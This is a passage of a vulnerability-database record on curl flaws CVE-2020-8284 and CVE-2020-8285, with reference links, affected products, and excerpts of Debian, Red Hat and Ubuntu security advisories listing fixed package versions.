        "url": "https://access.redhat.com/security/cve/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8648"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27170"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25215"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24331"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25692"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3326"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-2708"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23336"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-2433"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8927"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24332"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12364"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-10228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27618"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=securitypatches\u0026version=2.4.37"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.openssl\u0026downloadtype=securitypatches\u0026version=1.1.1g"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.37/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2471"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2472"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1860"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1857"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1876"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1851"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht212326."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1875"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1847"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27942"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1797"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1873"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1868"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8231"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1814"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1820"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1817"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7463"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1841"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1825"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1826"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1832"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/ht212325."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1829"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4665-1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4665-2"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186410"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "162360"
      },
      {
        "db": "PACKETSTORM",
        "id": "160706"
      },
      {
        "db": "PACKETSTORM",
        "id": "162358"
      },
      {
        "db": "PACKETSTORM",
        "id": "160436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-186410"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8285"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "162360"
      },
      {
        "db": "PACKETSTORM",
        "id": "160706"
      },
      {
        "db": "PACKETSTORM",
        "id": "162358"
      },
      {
        "db": "PACKETSTORM",
        "id": "160436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-186410"
      },
      {
        "date": "2020-12-14T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-8285"
      },
      {
        "date": "2021-06-17T17:53:22",
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "date": "2021-06-17T18:01:23",
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "date": "2021-06-17T18:09:26",
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "date": "2021-04-28T14:58:36",
        "db": "PACKETSTORM",
        "id": "162360"
      },
      {
        "date": "2020-12-24T17:16:22",
        "db": "PACKETSTORM",
        "id": "160706"
      },
      {
        "date": "2021-04-28T14:55:56",
        "db": "PACKETSTORM",
        "id": "162358"
      },
      {
        "date": "2020-12-10T16:02:10",
        "db": "PACKETSTORM",
        "id": "160436"
      },
      {
        "date": "2020-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      },
      {
        "date": "2020-12-14T20:15:13.983000",
        "db": "NVD",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-05-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-186410"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-8285"
      },
      {
        "date": "2023-06-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      },
      {
        "date": "2024-11-21T05:38:39.410000",
        "db": "NVD",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "HAXX libcurl Security hole",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      }
    ],
    "trust": 0.6
  }
}

VAR-202012-1277

Vulnerability from variot - Updated: 2026-03-09 21:22

A malicious server can use the FTP PASV response to trick curl 7.73.0 and earlier into connecting back to a given IP address and port, and this way potentially make curl extract information about services that are otherwise private and not disclosed, for example doing port scanning and service banner extractions. HAXX Haxx curl is a set of file transfer tools that use the URL syntax to work under the command line of the Swedish Haxx (HAXX) company. The tool supports file upload and download and includes a libcurl (client URL transfer library) for program development. There is a security vulnerability in Haxx curl FTP PASV Responses. Attackers can use this vulnerability to bypass data access restrictions and obtain sensitive information through curl's FTP PASV Responses. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-4881-1 security@debian.org https://www.debian.org/security/ Alessandro Ghedini March 30, 2021 https://www.debian.org/security/faq

Package : curl CVE ID : CVE-2020-8169 CVE-2020-8177 CVE-2020-8231 CVE-2020-8284 CVE-2020-8285 CVE-2020-8286 CVE-2021-22876 CVE-2021-22890 Debian Bug : 965280 965281 968831 977161 977162 977163

Multiple vulnerabilities were discovered in cURL, an URL transfer library:

CVE-2020-8169

Marek Szlagor reported that libcurl could be tricked into prepending
a part of the password to the host name before it resolves it,
potentially leaking the partial password over the network and to the
DNS server(s).

CVE-2020-8177

sn reported that curl could be tricked by a malicious server into
overwriting a local file when using th -J (--remote-header-name) and
-i (--include) options in the same command line.

CVE-2020-8231

Marc Aldorasi reported that libcurl might use the wrong connection
when an application using libcurl's multi API sets the option
CURLOPT_CONNECT_ONLY, which could lead to information leaks.

CVE-2020-8285

xnynx reported that libcurl could run out of stack space when using
tha FTP wildcard matching functionality (CURLOPT_CHUNK_BGN_FUNCTION).

CVE-2020-8286

It was reported that libcurl didn't verify that an OCSP response
actually matches the certificate it is intended to.

CVE-2021-22876

Viktor Szakats reported that libcurl does not strip off user
credentials from the URL when automatically populating the Referer
HTTP request header field in outgoing HTTP requests.

CVE-2021-22890

Mingtao Yang reported that, when using an HTTPS proxy and TLS 1.3,
libcurl could confuse session tickets arriving from the HTTPS proxy
as if they arrived from the remote server instead. This could allow
an HTTPS proxy to trick libcurl into using the wrong session ticket
for the host and thereby circumvent the server TLS certificate check.

For the stable distribution (buster), these problems have been fixed in version 7.64.0-4+deb10u2.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

This release adds the new Apache HTTP Server 2.4.37 Service Pack 8 packages that are part of the JBoss Core Services offering.

Security Fix(es):

curl: Use-after-free in TLS session handling when using OpenSSL TLS backend (CVE-2021-22901)
httpd: NULL pointer dereference on specially crafted HTTP/2 request (CVE-2021-31618)
libcurl: partial password leak over DNS on HTTP redirect (CVE-2020-8169)
curl: FTP PASV command response can cause curl to connect to arbitrary host (CVE-2020-8284)
curl: Malicious FTP server can trigger stack overflow when CURLOPT_CHUNK_BGN_FUNCTION is used (CVE-2020-8285)
curl: Inferior OCSP verification (CVE-2020-8286)
curl: Leak of authentication credentials in URL via automatic Referer (CVE-2021-22876)
curl: TLS 1.3 session ticket mix-up with HTTPS proxy host (CVE-2021-22890)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:

Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.

The References section of this erratum contains a download link for the update. You must be logged in to download the update. Bugs fixed (https://bugzilla.redhat.com/):

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve

JIRA issues fixed (https://issues.jboss.org/):

TRACING-1725 - Elasticsearch operator reports x509 errors communicating with ElasticSearch in OpenShift Service Mesh project

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: OpenShift Container Platform 4.7.13 bug fix and security update Advisory ID: RHSA-2021:2121-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2021:2121 Issue date: 2021-06-01 CVE Names: CVE-2016-10228 CVE-2019-2708 CVE-2019-3842 CVE-2019-9169 CVE-2019-13012 CVE-2019-14866 CVE-2019-18811 CVE-2019-19523 CVE-2019-19528 CVE-2019-25013 CVE-2019-25032 CVE-2019-25034 CVE-2019-25035 CVE-2019-25036 CVE-2019-25037 CVE-2019-25038 CVE-2019-25039 CVE-2019-25040 CVE-2019-25041 CVE-2019-25042 CVE-2020-0431 CVE-2020-8231 CVE-2020-8284 CVE-2020-8285 CVE-2020-8286 CVE-2020-8927 CVE-2020-9948 CVE-2020-9951 CVE-2020-9983 CVE-2020-10543 CVE-2020-10878 CVE-2020-11608 CVE-2020-12114 CVE-2020-12362 CVE-2020-12464 CVE-2020-13434 CVE-2020-13543 CVE-2020-13584 CVE-2020-13776 CVE-2020-14314 CVE-2020-14344 CVE-2020-14345 CVE-2020-14346 CVE-2020-14347 CVE-2020-14356 CVE-2020-14360 CVE-2020-14361 CVE-2020-14362 CVE-2020-14363 CVE-2020-15358 CVE-2020-15437 CVE-2020-15586 CVE-2020-16845 CVE-2020-24330 CVE-2020-24331 CVE-2020-24332 CVE-2020-24394 CVE-2020-24977 CVE-2020-25212 CVE-2020-25284 CVE-2020-25285 CVE-2020-25643 CVE-2020-25659 CVE-2020-25704 CVE-2020-25712 CVE-2020-26116 CVE-2020-26137 CVE-2020-27618 CVE-2020-27619 CVE-2020-27783 CVE-2020-27786 CVE-2020-27835 CVE-2020-28196 CVE-2020-28935 CVE-2020-28974 CVE-2020-29361 CVE-2020-29362 CVE-2020-29363 CVE-2020-35508 CVE-2020-36242 CVE-2020-36322 CVE-2021-0342 CVE-2021-3121 CVE-2021-3177 CVE-2021-3326 CVE-2021-21642 CVE-2021-21643 CVE-2021-21644 CVE-2021-21645 CVE-2021-23336 CVE-2021-25215 CVE-2021-30465 =====================================================================

Summary:

Red Hat OpenShift Container Platform release 4.7.13 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.7.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.13. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2021:2122

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

This update fixes the following bug among others:

Previously, resources for the ClusterOperator were being created early in the update process, which led to update failures when the ClusterOperator had no status condition while Operators were updating. This bug fix changes the timing of when these resources are created. As a result, updates can take place without errors. (BZ#1959238)

Security Fix(es):

gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)

You may download the oc tool and use it to inspect release image metadata as follows:

(For x86_64 architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-x86_64

The image digest is sha256:783a2c963f35ccab38e82e6a8c7fa954c3a4551e07d2f43c06098828dd986ed4

(For s390x architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-s390x

The image digest is sha256:4cf44e68413acad063203e1ee8982fd01d8b9c1f8643a5b31cd7ff341b3199cd

(For ppc64le architecture)

$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.13-ppc64le

The image digest is sha256:d47ce972f87f14f1f3c5d50428d2255d1256dae3f45c938ace88547478643e36

Solution:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel ease-notes.html

Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster - -cli.html

Bugs fixed (https://bugzilla.redhat.com/):

1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1923268 - [Assisted-4.7] [Staging] Using two both spelling "canceled" "cancelled" 1947216 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go 1953963 - Enable/Disable host operations returns cluster resource with incomplete hosts list 1957749 - ovn-kubernetes pod should have CPU and memory requests set but not limits 1959238 - CVO creating cloud-controller-manager too early causing upgrade failures 1960103 - SR-IOV obliviously reboot the node 1961941 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated 1962302 - packageserver clusteroperator does not set reason or message for Available condition 1962312 - Deployment considered unhealthy despite being available and at latest generation 1962435 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone 1963115 - Test verify /run filesystem contents failing

References:

https://access.redhat.com/security/cve/CVE-2016-10228 https://access.redhat.com/security/cve/CVE-2019-2708 https://access.redhat.com/security/cve/CVE-2019-3842 https://access.redhat.com/security/cve/CVE-2019-9169 https://access.redhat.com/security/cve/CVE-2019-13012 https://access.redhat.com/security/cve/CVE-2019-14866 https://access.redhat.com/security/cve/CVE-2019-18811 https://access.redhat.com/security/cve/CVE-2019-19523 https://access.redhat.com/security/cve/CVE-2019-19528 https://access.redhat.com/security/cve/CVE-2019-25013 https://access.redhat.com/security/cve/CVE-2019-25032 https://access.redhat.com/security/cve/CVE-2019-25034 https://access.redhat.com/security/cve/CVE-2019-25035 https://access.redhat.com/security/cve/CVE-2019-25036 https://access.redhat.com/security/cve/CVE-2019-25037 https://access.redhat.com/security/cve/CVE-2019-25038 https://access.redhat.com/security/cve/CVE-2019-25039 https://access.redhat.com/security/cve/CVE-2019-25040 https://access.redhat.com/security/cve/CVE-2019-25041 https://access.redhat.com/security/cve/CVE-2019-25042 https://access.redhat.com/security/cve/CVE-2020-0431 https://access.redhat.com/security/cve/CVE-2020-8231 https://access.redhat.com/security/cve/CVE-2020-8284 https://access.redhat.com/security/cve/CVE-2020-8285 https://access.redhat.com/security/cve/CVE-2020-8286 https://access.redhat.com/security/cve/CVE-2020-8927 https://access.redhat.com/security/cve/CVE-2020-9948 https://access.redhat.com/security/cve/CVE-2020-9951 https://access.redhat.com/security/cve/CVE-2020-9983 https://access.redhat.com/security/cve/CVE-2020-10543 https://access.redhat.com/security/cve/CVE-2020-10878 https://access.redhat.com/security/cve/CVE-2020-11608 https://access.redhat.com/security/cve/CVE-2020-12114 https://access.redhat.com/security/cve/CVE-2020-12362 https://access.redhat.com/security/cve/CVE-2020-12464 https://access.redhat.com/security/cve/CVE-2020-13434 https://access.redhat.com/security/cve/CVE-2020-13543 https://access.redhat.com/security/cve/CVE-2020-13584 https://access.redhat.com/security/cve/CVE-2020-13776 https://access.redhat.com/security/cve/CVE-2020-14314 https://access.redhat.com/security/cve/CVE-2020-14344 https://access.redhat.com/security/cve/CVE-2020-14345 https://access.redhat.com/security/cve/CVE-2020-14346 https://access.redhat.com/security/cve/CVE-2020-14347 https://access.redhat.com/security/cve/CVE-2020-14356 https://access.redhat.com/security/cve/CVE-2020-14360 https://access.redhat.com/security/cve/CVE-2020-14361 https://access.redhat.com/security/cve/CVE-2020-14362 https://access.redhat.com/security/cve/CVE-2020-14363 https://access.redhat.com/security/cve/CVE-2020-15358 https://access.redhat.com/security/cve/CVE-2020-15437 https://access.redhat.com/security/cve/CVE-2020-15586 https://access.redhat.com/security/cve/CVE-2020-16845 https://access.redhat.com/security/cve/CVE-2020-24330 https://access.redhat.com/security/cve/CVE-2020-24331 https://access.redhat.com/security/cve/CVE-2020-24332 https://access.redhat.com/security/cve/CVE-2020-24394 https://access.redhat.com/security/cve/CVE-2020-24977 https://access.redhat.com/security/cve/CVE-2020-25212 https://access.redhat.com/security/cve/CVE-2020-25284 https://access.redhat.com/security/cve/CVE-2020-25285 https://access.redhat.com/security/cve/CVE-2020-25643 https://access.redhat.com/security/cve/CVE-2020-25659 https://access.redhat.com/security/cve/CVE-2020-25704 https://access.redhat.com/security/cve/CVE-2020-25712 https://access.redhat.com/security/cve/CVE-2020-26116 https://access.redhat.com/security/cve/CVE-2020-26137 https://access.redhat.com/security/cve/CVE-2020-27618 https://access.redhat.com/security/cve/CVE-2020-27619 https://access.redhat.com/security/cve/CVE-2020-27783 https://access.redhat.com/security/cve/CVE-2020-27786 https://access.redhat.com/security/cve/CVE-2020-27835 https://access.redhat.com/security/cve/CVE-2020-28196 https://access.redhat.com/security/cve/CVE-2020-28935 https://access.redhat.com/security/cve/CVE-2020-28974 https://access.redhat.com/security/cve/CVE-2020-29361 https://access.redhat.com/security/cve/CVE-2020-29362 https://access.redhat.com/security/cve/CVE-2020-29363 https://access.redhat.com/security/cve/CVE-2020-35508 https://access.redhat.com/security/cve/CVE-2020-36242 https://access.redhat.com/security/cve/CVE-2020-36322 https://access.redhat.com/security/cve/CVE-2021-0342 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/cve/CVE-2021-3177 https://access.redhat.com/security/cve/CVE-2021-3326 https://access.redhat.com/security/cve/CVE-2021-21642 https://access.redhat.com/security/cve/CVE-2021-21643 https://access.redhat.com/security/cve/CVE-2021-21644 https://access.redhat.com/security/cve/CVE-2021-21645 https://access.redhat.com/security/cve/CVE-2021-23336 https://access.redhat.com/security/cve/CVE-2021-25215 https://access.redhat.com/security/cve/CVE-2021-30465 https://access.redhat.com/security/updates/classification/#moderate

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYLXBgdzjgjWX9erEAQiYKw/+MeUvVzbi9kHuo6vE8J9xEQCvgpJtLfRM yj4VFCt8lkWmfGmuAMd5LkvD5suav1Gu9yA6E60VvKrorV6+PDOZ8jiUyzRR+di6 TZZ7Ji6taqaQUuf451KF39zuxYAh29pKT6mZMhmqK65jEg7uj66R8+P2p7tahaai Kkqe6LKxNCXyVzWmc5HHkc3AJJ6vSVIuMeA6KOHpXy0vy57jZKeyb3dau0BVl/ir ZbnbOHdTJ+7hEVV3yGwARcVgUhHDcHiSYAS+RUj7Hqx0RIFilb9RbOdoEdbauaWx CGIdSYmj1F4apCZuYWmhZxtQ5/Lsj7EPi+7UleyTzqgMQsqSr8kvxGe/yzfY+yAQ ++QCSnleeKu/+HjN72d73h8yWGGzMrc/rYwDJWcFwjIL6/pj4Tgm4OK30vJlQUz5 3gHuEDz+j42s270cv6dRDd9v5xpexxIOXyHzruFRLk4xVCnS17PGeJ4I9mJmkYxL 5GuCiMnixToobWtmrh9MX2Qjkhj81o4E+rLMvG/4yUk2kGejo/nLwgZNsSz8gN5Z gMZOYSDys2zJu6/jmxY/8MXzS3yNIJj3FxXe7w5XA0mHUuuZ/EaJsMLnlCCSRARV GpMwj1/Aj1ZSNeYplr2YwQz7lB7hp+J/vn567zBPeYQus5EAyzqzudTbSLdm8ZyL PEh85hYKLe4= =Xe05 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-4665-2 December 09, 2020

curl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 14.04 ESM
Ubuntu 12.04 ESM

Summary:

Several security issues were fixed in curl.

Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries

Details:

USN-4665-1 fixed several vulnerabilities in curl. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.

Original advisory details:

Varnavas Papaioannou discovered that curl incorrectly handled FTP PASV responses. (CVE-2020-8284)

It was discovered that curl incorrectly handled FTP wildcard matchins. A remote attacker could possibly use this issue to cause curl to consume resources and crash, resulting in a denial of service. (CVE-2020-8285)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: curl 7.35.0-1ubuntu2.20+esm6 libcurl3 7.35.0-1ubuntu2.20+esm6 libcurl3-gnutls 7.35.0-1ubuntu2.20+esm6 libcurl3-nss 7.35.0-1ubuntu2.20+esm6

Ubuntu 12.04 ESM: curl 7.22.0-3ubuntu4.29 libcurl3 7.22.0-3ubuntu4.29 libcurl3-gnutls 7.22.0-3ubuntu4.29 libcurl3-nss 7.22.0-3ubuntu4.29

In general, a standard system update will make all the necessary changes.

Security Fix(es):

golang: crypto/tls: certificate of wrong type is causing TLS client to panic (CVE-2021-34558)
golang: net: lookup functions may return invalid host names (CVE-2021-33195)
golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty (CVE-2021-33197)
golang: match/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents (CVE-2021-33198)
golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a custom TokenReader (CVE-2021-27918)
golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header (CVE-2021-31525)
golang: archive/zip: malformed archive may cause panic or memory exhaustion (CVE-2021-33196)

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "11.0.1"
      },
      {
        "_id": null,
        "model": "essbase",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "21.2"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "m12-2s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "fujitsu",
        "version": "xcp3110"
      },
      {
        "_id": null,
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
